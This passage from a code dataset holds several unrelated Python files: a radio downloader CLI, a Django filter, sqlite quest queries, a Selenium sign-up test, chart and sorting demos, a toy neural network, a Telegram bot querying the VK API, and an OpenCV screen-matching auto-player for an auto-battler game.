self.ft[:8])))\n return True\n except:\n return False\n\n\n@click.command(help='Radipy is CLI radiko Downloader written by python3.')\n@click.option('-a', '--area', is_flag=True, help='print station id & name in your area')\n@click.option('-id', type=str, help='set station id')\n@click.option('-ft', type=str, help='set start time')\n@click.option('--clear', is_flag=True, help='clear authkey and player in tmp dir')\ndef main(area, id, ft, clear):\n if clear:\n Radipy.clear()\n if area:\n radipy = Radipy(0, 0)\n radipy.get_channels()\n if id and ft:\n radipy = Radipy(station_id=id, ft=ft)\n radipy.create()\n\nif __name__ == '__main__':\n main()\n","sub_path":"radipy.py","file_name":"radipy.py","file_ext":"py","file_size_in_byte":9482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341699734","text":"from django import template\nfrom django.template.defaultfilters import stringfilter\n\nregister = 
template.Library()\n\n@register.filter\n@stringfilter\ndef container_status(value):\n \"\"\"\n Returns container status as a bootstrap class\n \"\"\"\n cls = ''\n if value.find('Up') > -1:\n cls = 'success'\n elif value.find('Exit 0') > -1:\n cls = 'info'\n else:\n cls = 'important'\n return cls\n\n","sub_path":"shipyard/templatetags/shipyard.py","file_name":"shipyard.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"124647719","text":"import sqlite3\n\nMY_DATABASE = \"db/quests.db\"\n\n\ndef remove_zero_skills(levels):\n \"\"\"Given a dict of skills, removes all skills that require level 0 and\n returns the ones remaining.\n\n Parameters:\n levels (dict): the original dictionary containing all the\n skills\n\n Returns:\n list>: the list of skills and levels, without the 0s\n \"\"\"\n actual_skills = []\n for skill in levels:\n if levels[skill] != 0:\n actual_skills.append((skill, levels[skill]))\n return actual_skills\n\n\ndef string_skills(levels):\n \"\"\" Given a dictionary of skills, replaces all zeros with an empty string.\n Also makes everything else a string.\n\n Parameters:\n levels(dict): the original dictionary containing all the\n skills.\n\n Returns:\n dict: the new dictionary with everything in strings and\n zero's blanked with empty strings.\n \"\"\"\n for skill in levels:\n if levels[skill] == 0:\n levels[skill] = \"\"\n else:\n levels[skill] = str(levels[skill])\n return levels\n\n\ndef get_level_dictionary(result):\n \"\"\"\n Given a tuple from the quest_levels relation, turn it into a dictionary\n of skill name to required level.\n\n Parameters:\n result (tuple): a tuple consisting of one row from the quest_levels\n relation\n\n Returns:\n dict>: each skill mapped to its required level\n \"\"\"\n return {'Agility': result[1],\n 'Attack': result[2],\n 'Constitution': result[3],\n 'Construction': result[4],\n 'Cooking': result[5],\n 'Crafting': result[6],\n 'Defence': result[7],\n 'Divination': result[8],\n 'Dungeoneering': result[9],\n 'Farming': result[10],\n 'Firemaking': result[11],\n 'Fishing': result[12],\n 'Fletching': result[13],\n 'Herblore': result[14],\n 'Hunter': result[15],\n 'Magic': result[16],\n 'Mining': result[17],\n 'Prayer': result[18],\n 'Ranged': result[19],\n 'Runecrafting': result[20],\n 'Slayer': result[21],\n 'Smithing': result[22],\n 'Strength': result[23],\n 'Summoning': result[24],\n 'Thieving': result[25],\n 'Woodcutting': result[26]\n }\n\n\ndef get_all_quest_names():\n \"\"\"Queries the database for all the quest names\n\n Returns:\n list> a list of tuples of which the first (and only) element\n is the name of the quest\n \"\"\"\n conn = sqlite3.connect(MY_DATABASE)\n cur = conn.cursor()\n cur.execute(\"SELECT name FROM quest_details\")\n results = cur.fetchall()\n cur.close()\n conn.close()\n if results is None:\n return []\n return results\n\n\ndef get_quest_info(quest_name):\n \"\"\" For the quest with the given name, it returns a dictionary of all the\n information.\n\n Parameters:\n quest_name (str): the name of the quest we are investigating\n\n Returns:\n dict: a dictionary that maps the name of the quest info to\n its actual info\n \"\"\"\n conn = sqlite3.connect(MY_DATABASE)\n cur = conn.cursor()\n\n cur.execute(\"\"\" SELECT * FROM quest_details WHERE name=?\"\"\",\n (quest_name,))\n results_details = cur.fetchone()\n\n cur.execute(\"\"\" SELECT * FROM quest_levels WHERE name=?\"\"\",\n (quest_name,))\n result_levels = 
remove_zero_skills(get_level_dictionary(cur.fetchone()))\n\n cur.execute(\"\"\" SELECT pre_quest FROM pre_quests WHERE main_quest=?\"\"\",\n (quest_name, ))\n result_pre_quests = [x[0] for x in cur.fetchall()]\n result_pre_quests.sort()\n\n cur.execute(\"\"\" SELECT requirement\n FROM quest_other_requirements\n WHERE name=?\"\"\", (quest_name,))\n result_other_requirements = [x[0] for x in cur.fetchall()]\n\n cur.execute(\"\"\" SELECT name\n FROM quest_series\n WHERE quest=?\"\"\", (quest_name, ))\n result_quest_series = [x[0] for x in cur.fetchall()]\n\n cur.execute(\"\"\" SELECT name\n FROM quest_series_related\n WHERE quest=?\"\"\", (quest_name,))\n result_quest_series_related = [x[0] for x in cur.fetchall()]\n\n # Make this all into a dictionary so we can refer to it easily inside the\n # HTML\n final_result = {\"name\": results_details[0],\n \"free?\": \"yes\" if results_details[1] else \"no\",\n \"age\": results_details[2],\n \"difficulty\": results_details[3],\n \"length\": results_details[4],\n \"quest points\": results_details[5],\n \"skills\": result_levels,\n \"pre quests\": result_pre_quests,\n \"other requirements\": result_other_requirements,\n \"quest series\": result_quest_series,\n \"related quests\": result_quest_series_related\n }\n\n cur.close()\n conn.close()\n return final_result\n\n\ndef get_quest_info_recursive(quest_name, parent_quest, all_quests):\n \"\"\" A recursive helper method for get_quest_info_including_sub. Will\n process everything including subquests correctly.\n\n Parameters:\n quest_name(str): the name of the quest\n parent_quest(str): the quest that this is a parent of.\n all_quests(list>>): the list of all quests\n processed this far.\n\n Returns:\n None: as the list is modified in place\n \"\"\"\n conn = sqlite3.connect(MY_DATABASE)\n cur = conn.cursor()\n\n cur.execute(\"\"\" SELECT * FROM quest_levels WHERE name=?\"\"\", (quest_name,))\n skills = string_skills(get_level_dictionary(cur.fetchone()))\n this_quest_skills_info = skills\n\n cur.execute(\"\"\" SELECT requirement\n FROM quest_other_requirements\n WHERE name=?\"\"\", (quest_name,))\n other_requirements = [x[0] for x in cur.fetchall()]\n this_quest_skills_info[\"other requirements\"] = other_requirements\n this_quest_skills_info[\"name\"] = quest_name\n this_quest_skills_info[\"parent quest\"] = parent_quest\n\n all_quests.append(this_quest_skills_info)\n # TODO: update return types to match this in documentation\n\n cur.execute(\"\"\" SELECT pre_quest FROM pre_quests WHERE main_quest=?\"\"\",\n (quest_name, ))\n sub_quests = [x[0] for x in cur.fetchall()]\n cur.close()\n conn.close()\n\n for quest in sub_quests:\n get_quest_info_recursive(quest, quest_name, all_quests)\n\n\ndef get_quest_info_including_sub(quest_name):\n \"\"\" For the quest with the given name return its level as well as the\n levels for all its subquests.\n\n Parameters:\n quest_name(str): the name of the quest we are investigating\n\n Returns:\n list>>: a list where each item corresponds\n to a particular quest (in subquest order). 
This is a dictionary\n containing the quest name, mapped to the levels, parent quest\n and other requirements for that quest.\n\n\n \"\"\"\n all_quests = []\n parent_quest = None\n get_quest_info_recursive(quest_name, parent_quest, all_quests)\n return all_quests\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590049748","text":"import re\n\n\ndef process_josa(sentence):\n josa_list = ['은(는)', '을(를)', '이(가)']\n\n for josa in josa_list:\n substr = re.sub('[()]', '', josa)\n\n while sentence.find(josa) != -1:\n x = sentence[sentence.find(josa) - 1]\n\n if (ord(x) - ord('가')) % 28 == 0:\n sentence = sentence.replace(josa, substr[1])\n else:\n sentence = sentence.replace(josa, substr[0])\n\n return sentence\n\n\nif __name__ == '__main__':\n s = '나은(는) 여자을(를) 사랑한다.'\n print(process_josa(s))\n","sub_path":"question/recommend/josa.py","file_name":"josa.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195589880","text":"from page.home.sign_up_page import SignUpPage\nimport pytest\nimport unittest\nimport time\n\n\n@pytest.mark.usefixtures(\"oneTimeSetUp\", \"setUp\")\nclass SignUpTests(unittest.TestCase):\n\n @pytest.fixture(autouse=True)\n def classSetUp(self, oneTimeSetUp):\n self.sp = SignUpPage(self.driver)\n self.sp.getSignUpWindow()\n\n # def test_verifySignUpFailed(self):\n # self.sp.sign_up(\"marishenk\")\n # time.sleep(3)\n # result = self.sp.verifySignUpFailed()\n # assert result == True\n # print(\"Try sign up one more time\")\n\n def test_verifySignUpSuccessful(self):\n # self.sp.clearEmailField()\n # self.sp.checkbox()\n self.sp.sign_up(\"margdga\", \"marfdgdfgfdhenk@mail.ru\", \"Medfgfdgege123\")\n result = self.sp.verifySignUpSuccessful()\n assert result is True\n print(\"Sign up was successful\")\n time.sleep(3)","sub_path":"tests/home/sign_up_tests.py","file_name":"sign_up_tests.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496975152","text":"# importamos matplotlib con el alias plt\nimport matplotlib.pyplot as plt\n\nganacias = [1000, 2500, 1200, 2200]\ntiempo = ['2018', '2019', '2020', '2021']\n\n\ndef chart_basic():\n plt.plot(ganacias, tiempo)\n plt.ylabel('Tiempo')\n plt.xlabel('Ganancias')\n plt.show()\n\n\ndef chart_points():\n plt.plot(ganacias, tiempo, 'ro')\n # plt.axis([1000, 1200, 1400, 1500])\n plt.show()\n\n\ndef chart_bar():\n fig, ax = plt.subplots()\n rects1 = ax.bar(tiempo, ganacias, color=\"green\")\n ax.set_title('Tiempo X Ganancias del 2018 - 2021')\n ax.set_xlabel('Tiempo')\n ax.set_ylabel('Ganancias')\n ax.bar_label(rects1, padding=3)\n plt.savefig('chart_bar_green.svg')\n # plt.show()\n\n\ndef chart_pie():\n labels = 'Producto1', 'Producto2', 'Producto3', 'Producto4'\n sizes = [15, 30, 5, 50]\n explode = (0, 0.1, 0, 0)\n fig, ax = plt.subplots()\n ax.pie(sizes, labels=labels, shadow=True, startangle=90,\n autopct='%1.1f%%', explode=explode, textprops=dict(color=\"b\"))\n ax.legend()\n\n plt.show()\n\n\nchart_pie()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195101735","text":"def shell_sort(li):\n \"\"\"希尔排序\"\"\"\n n = len(li)\n gap = n // 2\n while gap: # 
my own version, fairly concise\n        # control how the gap shrinks\n        for j in range(gap, n):\n            # insertion sort; the only difference from plain insertion sort is the gap-sized step\n            i = j\n            while i > 0:\n                if li[i] < li[i - gap]:\n                    li[i], li[i - gap] = li[i - gap], li[i]\n                else:\n                    break\n                i -= gap\n        # shrink the gap\n        gap = gap // 2\n\nalist = [54, 26, 93, 17, 77, 31, 44, 55, 20]\nshell_sort(alist)\nprint(alist)\n\"\"\"\n[17, 20, 26, 31, 44, 54, 55, 77, 93]\n\"\"\"\n","sub_path":"darkhorse/24_数据结构和算法/hm014_希尔排序.py","file_name":"hm014_希尔排序.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"178670801","text":"from com.deconware.algorithms.psf.PsfGenerator import PsfType\n\nclass CreatePsf(object):\n\tdef __init__(self, space, emissionWavelength, numericalAperture, lensRefractiveIndex, \\\n\t\t\t\t\tspecimenRefractiveIndex, specimenDepth, homeDirectory=\"\", scopeType=PsfType.WIDEFIELD):\n\t\tself.space=space\n\t\tself.emissionWavelength=emissionWavelength \n\t\tself.numericalAperture=numericalAperture\n\t\tself.lensRefractiveIndex=lensRefractiveIndex \n\t\tself.specimenRefractiveIndex=specimenRefractiveIndex \n\t\tself.specimenDepth=specimenDepth \n\t\tself.homeDirectory=homeDirectory\n\n\tdef createPsf(self, ops, size):\n\t\treturn ops.run(\"psf\", size[0], size[2], self.space, self.emissionWavelength, self.numericalAperture, self.lensRefractiveIndex, self.specimenRefractiveIndex, self.specimenDepth)\n\t\t\n","sub_path":"jython/psf/CreatePsf.py","file_name":"CreatePsf.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297507015","text":"from numpy import *\n\nrandom.seed(1)\n\ndef sigmoid(x,deriv=False):\n    if(deriv==True):\n        return x * (1-x)\n    return 1/(1+exp(-x))\n\ndef init_weights(in_,out_):\n    return 2*random.random((in_,out_)) - 1\n    \nX = array( [[0,0,0,0,0,1],\n            [0,0,0,0,1,0],\n            [1,0,1,0,0,0],\n            [1,1,1,0,0,0],\n            [0,1,0,1,0,1],\n            [1,0,1,0,1,0],\n            [1,0,0,0,0,0],\n            [0,1,0,1,0,0],\n            [0,0,0,1,1,0],\n\n            [0,1,1,0,0,1],\n            [1,1,0,0,1,0],\n            [1,1,1,1,1,1],\n            [1,1,1,0,0,0],\n            [0,1,0,1,0,1],\n            [1,0,1,0,1,0],\n            [1,1,0,0,0,0],\n            [0,1,0,1,0,0],\n            [0,0,1,1,1,0],\n            [0,0,0,0,0,0],\n            [1,0,0,1,1,0]])\n    \ny = array( [[0],\n\t\t\t[1],\n\t\t\t[1],\n\t\t\t[0],\n            [0],\n            [1],\n            [1],\n            [0],\n            [0],\n            \n            [0],\n\t\t\t[0],\n\t\t\t[0],\n\t\t\t[0],\n            [0],\n            [1],\n            [0],\n            [0],\n            [0],\n            [0],\n            [0]])\n\nsyn1 = init_weights(6,24)\nsyn2 = init_weights(24,48)\nsyn3 = init_weights(48,96)\nsyn4 = init_weights(96,192)\nsyn5 = init_weights(192,96)\nsyn6 = init_weights(96,48)\nsyn7 = init_weights(48,24)\nsyn8 = init_weights(24,12)\nsyn9 = init_weights(12,6)\nsyn10= init_weights(6,1)\n\nfor _ in range(60000):\n\n    l0 = X\n    l1 = sigmoid(dot(l0,syn1))\n    l2 = sigmoid(dot(l1,syn2))\n    l3 = sigmoid(dot(l2,syn3))\n    l4 = sigmoid(dot(l3,syn4))\n    l5 = sigmoid(dot(l4,syn5))\n    l6 = sigmoid(dot(l5,syn6))\n    l7 = sigmoid(dot(l6,syn7))\n    l8 = sigmoid(dot(l7,syn8))\n    l9 = sigmoid(dot(l8,syn9))\n    l10 = sigmoid(dot(l9,syn10))\n\n\n    l10_error = y - l10\n    l10_weighted_errors = l10_error*sigmoid(l10,deriv=True)\n    \n    if (_% 10000) == 0:\n        print (\"Error:\" + str(mean(abs(l10_error))))\n        \n\n    l9_error = dot(l10_weighted_errors, syn10.T)\n    l9_weighted_errors = l9_error * sigmoid(l9,deriv=True)\n\n    l8_error = l9_weighted_errors.dot(syn9.T)\n    l8_weighted_errors = l8_error * sigmoid(l8,deriv=True)\n\n    l7_error = l8_weighted_errors.dot(syn8.T)\n    l7_weighted_errors = l7_error * sigmoid(l7,deriv=True)\n\n    
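# the same backpropagation recurrence repeats for each remaining layer below:\n    # push the next layer's weighted error back through its weight matrix (dot with\n    # the transposed syn), then scale by the sigmoid derivative of this layer's output\n    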
l6_error = l7_weighted_errors.dot(syn7.T)\n    l6_weighted_errors = l6_error * sigmoid(l6,deriv=True)\n\n    l5_error = l6_weighted_errors.dot(syn6.T)\n    l5_weighted_errors = l5_error * sigmoid(l5,deriv=True)\n\n    l4_error = l5_weighted_errors.dot(syn5.T)\n    l4_weighted_errors = l4_error * sigmoid(l4,deriv=True)\n\n    l3_error = l4_weighted_errors.dot(syn4.T)\n    l3_weighted_errors = l3_error * sigmoid(l3,deriv=True)\n\n    l2_error = l3_weighted_errors.dot(syn3.T)\n    l2_weighted_errors = l2_error * sigmoid(l2, deriv=True) \n\n    l1_error = l2_weighted_errors.dot(syn2.T)\n    l1_weighted_errors = l1_error * sigmoid(l1, deriv=True)\n    \n    syn10 += l9.T.dot(l10_weighted_errors)\n    syn9 += l8.T.dot(l9_weighted_errors)\n    syn8 += l7.T.dot(l8_weighted_errors)\n    syn7 += l6.T.dot(l7_weighted_errors)\n    syn6 += l5.T.dot(l6_weighted_errors)\n    syn5 += l4.T.dot(l5_weighted_errors)\n    syn4 += l3.T.dot(l4_weighted_errors)\n    syn3 += l2.T.dot(l3_weighted_errors)\n    syn2 += l1.T.dot(l2_weighted_errors)\n    syn1 += l0.T.dot(l1_weighted_errors)\n\na=(sigmoid(dot(array([1,1,1,0,1,0]), syn1)))\nb=sigmoid(dot(a, syn2))\nc=sigmoid(dot(b,syn3))\nd=sigmoid(dot(c,syn4))\ne=sigmoid(dot(d,syn5))\nf=sigmoid(dot(e,syn6))\ng=sigmoid(dot(f,syn7))\nh=sigmoid(dot(g,syn8))\ni=sigmoid(dot(h,syn9))\nj=sigmoid(dot(i,syn10))\n\nprint(j)","sub_path":"neuro1.py","file_name":"neuro1.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"13394871","text":"import config\nimport telebot,datetime,aiohttp,asyncio\n\n\nbot = telebot.TeleBot(config.token)\n\n@bot.message_handler(commands=[\"hello\"])\ndef repeat_all_messages(message): # the function name does not really matter here\n    bot.send_message(message.chat.id, 'Hi')\n\nasync def loading(messege):\n    bot.send_message(messege.chat.id,'Loading...')\n\nasync def friends_ages(message):\n    await loading(message)\n    try:\n        username = message.text.split(' ')[1]\n    except:\n        bot.send_message(message.chat.id,'Вы забыли ввести id пользователя')\n        return 0\n    async with aiohttp.ClientSession() as session:\n        async with session.get(\"https://api.vk.com/method/users.get?user_ids=\"+username+\"&fields=bdate&v=5.58\") as resp:\n            req_id = await resp.json()\n        try:\n            user_id = req_id['response'][0].get('id')\n        except:\n            bot.send_message(message.chat.id,'Такого пользователя не существует')\n            return 0\n        async with session.get(\"https://api.vk.com/method/friends.get?user_id=\"+str(user_id)+\"&fields=bdate&v=5.58\") as resp:\n            req = await resp.json()\n        count = req['response'].get('count')\n        i = 0\n        bArr = []\n        while i < count:\n            bdate = req['response']['items'][i].get('bdate')\n            if bdate:\n                if len(bdate) > 5:\n                    try:\n                        bdate = datetime.datetime.strptime(bdate, \"%d.%m.%Y\")\n                        bArr.insert(i, bdate)\n                    except:\n                        print('1')\n            i += 1\n        diag = [0 for i in range(150)]\n        count1 = len(bArr)\n        i = 0\n        a = []\n        while i < count1:\n            result = (datetime.datetime.today() - bArr[i]) / 365\n            result = str(result).split(' ')\n            j = int(result[0])\n            diag[j] += 1\n            i += 1\n\n        i = 0\n        cnt = len(diag)\n        answer = [' ']\n        while i < cnt:\n            if diag[i] != 0:\n                j = 0\n                answer.append(str(i))\n                answer.append('-')\n                while j < diag[i]:\n                    answer.append(\".\")\n                    j += 1\n                answer.append(\"\\n\")\n\n            i += 1\n        bot.send_message(message.chat.id,' '.join(answer))\n\nasync def group_ages(message):\n    offset = 0\n    await loading(message)\n    try:\n        groupname = message.text.split(' ')[1]\n    except:\n        bot.send_message(message.chat.id,'Вы забыли ввести 
id группы')\n return 0\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://api.vk.com/method/groups.getMembers?group_id=\"+groupname+\"&offset=\"+str(offset)+\"&fields=bdate&fields=bdate&v=5.58\") as resp:\n req_id = await resp.json()\n count = req_id['response'].get('count')\n loops= count/1000\n i = 0\n bArr=[]\n while i < loops:\n async with session.get(\"https://api.vk.com/method/groups.getMembers?group_id=\" + groupname + \"&offset=\" + str(offset) + \"&fields=bdate&fields=bdate&v=5.58\") as resp:\n j = 0\n req = await resp.json()\n if count-((i+1)*1000)>0:\n con = 1000\n per = int(100*1000*(i+1)/count)\n else:\n con = 1000-abs(count-(i+1)*1000)\n per = 100\n while j < con:\n bdate = req['response']['items'][j].get('bdate')\n if bdate:\n if len(bdate) > 5:\n try:\n bdate = datetime.datetime.strptime(bdate, \"%d.%m.%Y\")\n bArr.insert(j, bdate)\n except:\n print(\"wrong\")\n j += 1\n i += 1\n offset += 1000\n print(\"Выполнено: \"+str(per)+\"%\")\n diag = [0 for i in range(120)]\n count1 = len(bArr)\n i = 0\n while i < count1:\n result = (datetime.datetime.today() - bArr[i]) / 365\n result = str(result).split(' ')\n j = int(result[0])\n diag[j] += 1\n i += 1\n answer = [\" \"]\n i = 0\n cnt = len(diag)\n answer.append(\"Возраст - Кол-во\"+ \"\\n\")\n while i < cnt:\n if diag[i] != 0:\n answer.append(str(i))\n answer.append(' - ')\n answer.append(str(diag[i]))\n answer.append(\"\\n\")\n\n i += 1\n bot.send_message(message.chat.id,' '.join(answer))\n\n@bot.message_handler(commands=[\"friends_ages\"])\ndef friends(message):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n # Blocking call which returns when the display_date() coroutine is done\n loop.run_until_complete(friends_ages(message))\n loop.close()\n\n@bot.message_handler(commands=[\"group_ages\"])\ndef groups(message):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n # Blocking call which returns when the display_date() coroutine is done\n loop.run_until_complete(group_ages(message))\n loop.close()\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333764234","text":"from random import randint, random\nfrom time import sleep, time\n\nimport cv2\nimport pyautogui\nimport win32api\nimport win32con\nfrom PIL import ImageGrab\nfrom pykeyboard import PyKeyboard\nfrom pymouse import PyMouse\nfrom pynput.mouse import Controller\n\nfrom imginit import ImgInit\nfrom action import *\nfrom numpy import where, hstack\n\nmouse = Controller()\nm = PyMouse()\nk = PyKeyboard()\n\n# --------------------------位置信息----------------------\n# 装备位置 紫框\nequipPosX = [298, 342, 317, 351, 320, 334, 401, 380, 390, 440]\nequipPosY = [765, 729, 691, 666, 633, 595, 663, 634, 595, 633]\n\n# 英雄位置 红字标注\nheroPosX = [782, 582, 707, 838, 901, 1218, 1019, 1350]\nheroPosY = [444, 676, 676, 676, 444, 676, 444, 676]\n\n# 观众席坐标 棕框\nwatcherPosX = [446, 555, 674, 790, 906, 1022, 1137, 1253, 1366]\nwatcherPosY = [744, 739, 742, 743, 743, 744, 743, 744, 743]\n\n# 选择客户端\nX_START = 240\nX_END = 1700\nY_START = 200\nY_END = 1080\nsize = (X_START, Y_START, X_END, Y_END)\n\n# 小图坐标\nimgPos = {}\nimgPos['ChooseHero'] = (476, 900, 1493, 1072) # 英雄购买框 粉框\nimgPos['inGame'] = (263, 875, 468, 1074) # DF框 绿框\nimgPos['myTurn'] = (399, 82, 1528, 626) # 整个棋盘 蓝框\nimgPos['myHero'] = (419, 308, 1458, 623) # 半张棋盘 红框\nimgPos['start'] 
= (X_START, Y_START, X_END, Y_END) # 客户端\nimgPos['rightClick'] = (450, 172, 1419, 725) # 捡球坐标 黑框\n\n\n# --------------------------计时参数----------------------\nstartTime = time() # 游戏开始时间\nlastDTime = time() # 上一次D人的时间\nlastFTime = time() # 上一次上人口的时间\nlastEquipTime = time() # 上次装备时间\nlastBallTime = time() # 上次捡球时间\n\n\n# --------------------------启动标识----------------------\n# 点击接受比赛后,启动标识重置为1,第一次开始己方回合,startTime更新\nstart_flag = 1\n\n\n# --------------------------加载图片资源----------------------\nstartIcon, ChooseHeroIcon, rightClickIcon, leftClickDelayIcon, judgeHeroIcon, flags = ImgInit()\n\n\n# --------------------------------调试-------------------------------------\n# 方便看执行到哪一步了\ndebug_flag = 1\n\n\ndef show_action(info):\n if debug_flag:\n print(info)\n\n\n# --------------------------------识别-------------------------------------\n# 抓图\ndef grabRaw(imgKey):\n pic = ImageGrab.grab(imgPos[imgKey])\n pic.save(\"target.jpg\")\n target = cv2.imread(\"target.jpg\")\n show_action('抓图' + imgKey)\n return target\n\n\n# 评价模块\ndef judge(target, source):\n result = cv2.matchTemplate(target, source, cv2.TM_SQDIFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n return min_val, min_loc\n\n\n# 判断是否在游戏中 || 用是否有D F来判断\ndef judgeInGame():\n target = grabRaw('inGame')\n min_val, min_loc = judge(target, flags['in_game_flag']) # 检测是否在游戏中\n if min_val < 0.25:\n return True\n min_val, min_loc = judge(target, flags['in_game_flag2']) # 检测是否在游戏中\n if min_val < 0.25:\n return True\n return False\n\n\n# 判断是否是己方回合 || 用是否有友方血条和地方血条判断\ndef judgeMyTurn():\n\n target = grabRaw('myTurn')\n\n # 开局五分钟后再判断是否有敌方血条,要不然开局都是野怪,会愣着不动\n if (time() - startTime) > 180:\n min_val, min_loc = judge(target, flags['fighting_flag3']) # 没有敌方血条\n if min_val < flags['threshold']:\n return False\n min_val, min_loc = judge(target, flags['fighting_flag']) # 有友方血条\n if min_val < flags['threshold']:\n return True\n min_val, min_loc = judge(target, flags['fighting_flag2']) # 有友方血条\n if min_val < flags['threshold']:\n return True\n return False\n\n\n# 判断选中的是哪个英雄\ndef judgeHero(singlePos):\n hero = -1\n rightClick(singlePos[0], singlePos[1]) # 右键点击,呼出英雄界面\n sleep(0.7)\n pic = ImageGrab.grab(\n (singlePos[0] - 500,\n singlePos[1] - 400,\n singlePos[0] + 500,\n singlePos[1] + 400)) # 以点击处为中心,截取附近的图像,保证英雄信息可以被截取\n pic.save(\"target.jpg\")\n target = cv2.imread(\"target.jpg\")\n\n # 遍历,找匹配解\n for key in list(judgeHeroIcon.keys())[:-2]:\n min_val, min_loc = judge(target, judgeHeroIcon[key])\n if min_val < ChooseHeroIcon['threshold']:\n hero = list(judgeHeroIcon.keys()).index(key)\n break\n show_action('识别英雄' + str(hero))\n return hero\n\n\n# --------------------------------命令执行-------------------------------------\n# 执行按键命令\ndef doKey(key_dir, LorR):\n\n target = grabRaw(key_dir['name'])\n key_list = list(key_dir.keys())\n\n for key in key_list[:-2]:\n t_height, t_width = key_dir[key].shape[:2]\n min_val, min_loc = judge(target, key_dir[key])\n if min_val < key_dir['threshold']:\n show_action('执行' + key[:-4])\n\n if LorR == 'L':\n leftClick(\n imgPos[key_dir['name']][0] + min_loc[0] + t_width // 2,\n imgPos[key_dir['name']][1] + min_loc[1] + t_height // 2)\n if LorR == 'R':\n rightClick(\n imgPos[key_dir['name']][0] + min_loc[0] + t_width // 2,\n imgPos[key_dir['name']][1] + min_loc[1] + t_height // 2)\n sleep(0.1)\n\n\n# 给重开单独做一个按键函数,提高效率\ndef startKey():\n key_dir = startIcon\n\n target = grabRaw(key_dir['name'])\n key_list = list(key_dir.keys())\n\n for key in key_list[:-2]:\n t_height, t_width = key_dir[key].shape[:2]\n min_val, 
min_loc = judge(target, key_dir[key])\n        if min_val < key_dir['threshold']:\n            if key == 'accept_match.png':\n                show_action('--------------开始新游戏------------------')\n                global start_flag\n                start_flag = 1\n            show_action('执行' + key[:-4])\n            leftClick(\n                imgPos[key_dir['name']][0] + min_loc[0] + t_width // 2,\n                imgPos[key_dir['name']][1] + min_loc[1] + t_height // 2)\n            sleep(0.1)\n\n# execute the D command; the D icon has two variants\n\n\ndef D():\n    # icon for the 2-cost D\n    t_height, t_width = leftClickDelayIcon['d1.png'].shape[:2]\n    target = grabRaw('inGame')\n    min_val, min_loc = judge(target, leftClickDelayIcon['d1.png'])\n    if min_val < leftClickDelayIcon['threshold']:\n        show_action('D')\n        leftClick(\n            imgPos['inGame'][0] + min_loc[0] +\n            t_width //\n            2,\n            imgPos['inGame'][1] + min_loc[1] +\n            t_height //\n            2)\n        sleep(0.1)\n        return\n\n    # icon for the 0-cost D\n    t_height, t_width = leftClickDelayIcon['d2.png'].shape[:2]\n    target = grabRaw('inGame')\n    min_val, min_loc = judge(target, leftClickDelayIcon['d2.png'])\n    if min_val < leftClickDelayIcon['threshold']:\n        show_action('D')\n        leftClick(\n            imgPos['inGame'][0] + min_loc[0] +\n            t_width //\n            2,\n            imgPos['inGame'][1] + min_loc[1] +\n            t_height //\n            2)\n        sleep(0.1)\n\n\n# execute the F command\ndef F():\n    t_height, t_width = leftClickDelayIcon['f.png'].shape[:2]\n    target = grabRaw('inGame')\n    min_val, min_loc = judge(target, leftClickDelayIcon['f.png'])\n    if min_val < leftClickDelayIcon['threshold']:\n        show_action('F')\n        leftClick(\n            imgPos['inGame'][0] + min_loc[0] +\n            t_width //\n            2,\n            imgPos['inGame'][1] + min_loc[1] +\n            t_height //\n            2)\n        sleep(0.1)\n\n\n# buy heroes\ndef ChooseHero():\n    # protection during the first 3 minutes of a game\n    if (time() - startTime) < 180:\n        if random() > 0.7:\n            leftClick(589, 984)  # buy the leftmost hero so the early monster rounds can be won\n    doKey(ChooseHeroIcon, 'L')\n\n\n# get the heroes' positions\ndef getHeroPos():\n    try:\n        # multi-target matching: anchor on the hero health bar, then shift 40 px right and 70 px down to find the hero's center\n        target = grabRaw('myHero')\n        temp_HeroPos = []\n\n        template = flags['fighting_flag']\n        ret = cv2.matchTemplate(target, template, cv2.TM_CCORR_NORMED)\n        index = where(ret > 0.9)\n        for i in zip(*index[::-1]):\n            temp_HeroPos.append((i[0] + 40, i[1] + 70))\n\n        template = flags['fighting_flag2']\n        ret = cv2.matchTemplate(target, template, cv2.TM_CCORR_NORMED)\n        index = where(ret > 0.9)\n        for i in zip(*index[::-1]):\n            temp_HeroPos.append((i[0] + 40, i[1] + 70))\n\n        # the match ran on a cropped screenshot, so convert back to absolute coordinates\n        HeroPos = []\n        done_flag = 0\n        HeroPos.append((temp_HeroPos[0][0] + imgPos['myHero'][0],\n                        temp_HeroPos[0][1] + imgPos['myHero'][1]))\n\n        # multi-target matching may detect the same hero several times, so merge positions that are too close to each other\n        for singlePos in temp_HeroPos:\n            for donePos in HeroPos:\n                if abs(\n                        singlePos[0] + imgPos['myHero'][0] -\n                        donePos[0]) < 15 and abs(\n                        singlePos[1] + imgPos['myHero'][1] -\n                        donePos[1]) < 